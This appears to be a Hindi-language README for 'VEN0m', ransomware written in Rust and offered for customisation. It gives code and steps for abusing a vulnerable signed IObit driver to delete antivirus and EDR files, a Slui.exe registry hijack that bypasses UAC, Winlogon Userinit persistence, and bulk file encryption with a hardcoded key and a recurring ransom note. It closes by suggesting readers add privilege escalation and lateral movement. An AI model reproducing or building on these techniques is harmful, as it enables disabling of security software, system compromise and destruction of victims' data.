
पूरी तरह से अज्ञेय और चोरी-छिपे रैनसमवेयर, जो Rust में लिखा गया है और संक्रमित सिस्टम पर AV/EDR समाधानों को निष्क्रिय करने के लिए BYOVD तकनीक का लाभ उठाता है।
https://github.com/user-attachments/assets/5a1fc9b5-a647-41f6-a152-7b9d97381adc
यह प्रोजेक्ट दर्शाता है कि कैसे एक वैध और हस्ताक्षरित ड्राइवर को बचाव उपायों को चकमा देने और एक वास्तविक साइबर हमले का अनुकरण करते हुए रैनसमवेयर तैनात करने के लिए हथियार बनाया जा सकता है।
🚨 Windows 11 Pro 24H2 पर परीक्षण किया गया। प्रारंभिक रिलीज़ दिनांक: 02-23-2026 तक पूरी तरह से अज्ञात।*
चोरी UAC बाईपास BitDefender ✅ ✅ Kaspersky ✅ ✅ MS Defender ✅ ❌
VEN0m क्लासिक BYOVD तकनीक का उपयोग करता है, लेकिन AV-EDR-KILLER के विपरीत, जो एक कमजोर ड्राइवर का शोषण करता है जो कर्नेल फंक्शन ZwTerminateProcess को अविशेषाधिकार प्राप्त उपयोगकर्ताओं के लिए उजागर करता है, यह IObit Malware Fighter v12.1.0 में शामिल एक कमजोर ड्राइवर का लाभ उठाता है, जो काफी विडंबनापूर्ण है क्योंकि हम इसका उपयोग चोरी के लिए कर रहे हैं।
यहाँ प्रश्न में ड्राइवर IMFForceDelete.sys है, जो एक IOCTL को उजागर करता है जो अविशेषाधिकार प्राप्त उपयोगकर्ताओं को मनमानी फ़ाइलों को हटाने की अनुमति देता है। इस कमजोरी को CVE-2025-26125 के रूप में ट्रैक किया जाता है, और ड्राइवर अभी भी Microsoft की ब्लॉकलिस्ट में नहीं है।
मनमानी हटाने को ट्रिगर करने के लिए, हम IOCTL कोड 0x8016E000, लक्ष्य फ़ाइल का प्रतिनिधित्व करने वाले एक विस्तृत यूनिकोड स्ट्रिंग के लिए एक लंबे शून्य पॉइंटर, और कुल लंबाई को 2 से गुणा करके (क्योंकि wstr_file.len() u16 तत्वों की संख्या देता है और प्रत्येक तत्व 2 बाइट का होता है) u32 के रूप में डालकर API कॉलिंग कन्वेंशन के DWORD पैरामीटर में फिट होने के लिए DeviceIoControl API कॉल का आह्वान करते हैं।
> DeviceIoControl(hDriver, 0x8016E000, wstr_file.as_ptr() as LPVOID, (wstr_file.len() * 2) as u32, ptr::null_mut(), 0, &mut bytes_returned, ptr::null_mut())
[!NOTE]
+ ❓ AV-EDR-Killer कुछ AV/EDR उत्पादों के खिलाफ क्यों विफल रहा?
इसके पीछे मुख्य विचार एक ड्राइवर का शोषण करना था जिसमें असुरक्षित IOCTL हैं जो कर्नेल फंक्शन
ZwTerminateProcessको उजागर करते हैं, जो किसी भी उपयोगकर्ता-मोड एप्लिकेशन को कर्नेल-स्तरीय समाप्ति क्षमताएं प्रदान करता है। इस तकनीक की कमजोरी यह है कि कुछ AV/EDR उत्पाद उक्त फंक्शन को हुक करते हैं और इस पर कॉल को रोक सकते हैं।एक और उल्लेखनीय तकनीक एक निश्चित कमजोर ड्राइवर के मनमानी पढ़ने/लिखने के आदिम का शोषण करके मेमोरी को पैच करना और एक और भी शक्तिशाली समाप्ति फंक्शन,
PsTerminateProcessपर कूदना था, जोntoskrnl.exeद्वारा स्वयं निर्यात नहीं किया जाता है। यह भी बहुत संदिग्ध है क्योंकि होस्ट सुरक्षा उपाय लगातार मेमोरी को स्कैन कर रहे हैं। संदर्भ : https://securelist.com/av-killer-exploiting-throttlestop-sys/117026/
हम बस डिस्क पर इंस्टॉलेशन फ़ोल्डर्स और एक्सिक्यूटेबल्स को काट-छाँट कर देते हैं। यह उतना ही सरल है!
यह अधिकांश सुरक्षा उत्पादों के लिए एक ब्लाइंड स्पॉट प्रतीत होता है, क्योंकि हम मेमोरी में हेरफेर करने या संदिग्ध कॉल करने के बजाय डिस्क पर फ़ाइलों को लक्षित कर रहे हैं। अपने IMFForceDelete.sys ड्राइवर का उपयोग करके, हम उच्च विशेषाधिकारों के साथ लॉक की गई फ़ाइलों को जबरन हटा सकते हैं। सीधे किसी AV या EDR उत्पाद पर हमला करना काउंटर-इंट्यूटिव लगता है, क्योंकि हमलावर आमतौर पर बचाव को चकमा देने के लिए चुपके से काम करना चाहते हैं, न कि उनका सामना करना।
इस तकनीक का उपयोग करके, हमने चल रही EDR/AV प्रक्रियाओं को तब तक दूषित किया जब तक कि वे धीरे-धीरे टूट नहीं गईं और ठीक से काम करना बंद नहीं कर दिया, जिससे तबाही मचाने और अपने पसंदीदा पेलोड, VEN0m को तैनात करने का द्वार खुल गया।
const TARGETS: &[&str] = &[r"C:\Program Files (x86)\Kaspersky Lab", r"C:\Program Files\Bitdefender", r"C:\Program Files\Bitdefender Agent", r"C:\Program Files\Windows Defender",];
UAC संकेतों को बायपास करने के लिए, हम एक हस्ताक्षरित Microsoft बाइनरी Slui.exe के निष्पादन प्रवाह को हाईजैक कर रहे हैं जो स्वचालित-एलिवेशन का समर्थन करता है, बिना किसी प्रशासनिक संदर्भ में runas क्रिया के साथ आह्वान करने पर कोई संकेत ट्रिगर किए।
मुख्य शोषण तब होता है जब Slui.exe HKCU\Software\Classes\Launcher.SystemSettings\Shell\Open\Command के तहत एक गैर-मौजूद रजिस्ट्री कुंजी खोलने का प्रयास करता है। हम इस दोष का लाभ उठाकर गुम कुंजी बनाते हैं और वर्तमान पेलोड को इंगित करने वाला DelegateExecute सम्मिलित करते हैं ताकि निष्पादन को प्रतिनिधि बनाया जा सके। फिर हम ShellExecuteW API कॉल के साथ runas क्रिया के साथ Slui.exe के निष्पादन को ट्रिगर करते हैं, जिसके परिणामस्वरूप एक सफल UAC बाईपास होता है। पूर्ण कार्यान्वयन /src/uac.rs में पाया जा सकता है।
[!IMPORTANT] मुझे यकीन नहीं है कि क्या यह एक कमजोरी है जिसे रिपोर्ट किया जाना चाहिए। यदि हां, तो कृपया नीचे दिए गए ईमेल के माध्यम से मुझसे संपर्क करने में संकोच न करें।
चूंकि VEN0m UAC को बायपास कर रहा है और उच्च अखंडता में चल रहा है, यह एम्बेडेड ड्राइवर को अस्थायी फ़ोल्डर में निकालने और MicrosoftUpdate11.01 जैसे छिपे नामों के साथ एक कर्नेल सेवा बनाने को स्वचालित करता है। इसमें बहुत उपयोगी जांच शामिल हैं जैसे कि सेवा बंद होने पर उसे ऑटोस्टार्ट करना या यदि वह पहले से मौजूद है तो उसे बनाने से बचना।
होस्ट सुरक्षा उपायों को बेअसर करने के बाद, आप जो भी स्थिरता तकनीक चाहते हैं उसे चुन सकते हैं।
मैंने एक सरल Winlogon Userinit तकनीक का उपयोग किया, जो HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon के तहत Userinit रजिस्ट्री कुंजी का लाभ उठाती है। डिफ़ॉल्ट रूप से, यह कुंजी userinit.exe को मान के रूप में निर्दिष्ट करती है, जो उपयोगकर्ता लॉगिन पर निष्पादित होकर उपयोगकर्ता वातावरण को आरंभ करता है।
हालांकि, हम वैध userinit.exe से अल्पविराम द्वारा अलग किए गए अपने पेलोड पथ को जोड़कर इसे हाईजैक करते हैं, साथ ही %LOCALAPPDATA% में मैलवेयर की एक प्रति भी छोड़ते हैं।
रैनसमवेयर निर्दिष्ट ड्राइव को लक्षित एक्सटेंशन वाली फ़ाइलों के लिए स्कैन करता है, जबकि एक बहिष्करण सूची के खिलाफ फ़िल्टर करता है। मिलान वाली फ़ाइलों को 32-बाइट हार्डकोडेड कुंजी का उपयोग करके एन्क्रिप्ट किया जाता है, और उनके एक्सटेंशन को .vnm में बदल दिया जाता है।
आप निम्नलिखित स्थिरांक को संशोधित करके व्यवहार को अनुकूलित कर सकते हैं:
const KEY: &[u8; 32] = b"G7m9Xq2vR4pL8bF1sW0cZ6kD3jN5yH8u";
const XClUSIONS: &[&str] = &["Windows", "Program Files", "Program Files (x86)", "ProgramData", "$Recycle.Bin", "All Users"];
const XTENSIONS: &[&str] = &["pdf", "doc", "xlms", "png", "jpg", "jpeg", "txt", "mp4"];
const DRV: &[&str] = &["C:\\", "D:\\", "E:\\", "F:\\"];
एन्क्रिप्शन पूरा करने पर, VEN0m डेस्कटॉप वॉलपेपर बदल देता है और डेस्कटॉप पर एक एक्जीक्यूटेबल फिरौती नोट छोड़ देता है। यह एक शेड्यूल्ड टास्क भी पंजीकृत करता है जो हर कुछ मिनटों में नोट GUI को लॉन्च करने के लिए चलता है, जो एक चमकदार खोपड़ी ☠️ प्रदर्शित करता है।
/assets/wallpaper.jpg को अपनी स्वयं की छवि से बदलकर वॉलपेपर को अनुकूलित कर सकते हैं।/src/task.rs को संपादित करके शेड्यूल्ड टास्क गुणों को संशोधित कर सकते हैं।VEN0m में एक डिक्रिप्टर उपकरण Antid0te.exe🧪 भी शामिल है जो .vnm एक्सटेंशन वाली फ़ाइलों को स्कैन करता है और एन्क्रिप्शन के लिए निर्दिष्ट उसी कुंजी का उपयोग करके एन्क्रिप्शन रूटीन को उलट देता है।
[!WARNING] अपनी फ़ाइलों को Antid0te.exe डिक्रिप्टर का उपयोग करके डिक्रिप्ट करने में सक्षम होने के लिए अपनी एन्क्रिप्शन कुंजी को सहेजना महत्वपूर्ण है।
VEN0m अत्यधिक मॉड्यूलर और अनुकूलन योग्य है। आप हार्डकोडेड स्थिरांक को संशोधित करके रैनसमवेयर के व्यवहार को बदल सकते हैं। आप इसे अपनी पसंद के विशेषाधिकार वृद्धि कमजोरी या पार्श्व आंदोलन तकनीक के साथ जोड़कर इसे अगले स्तर पर ले जा सकते हैं :)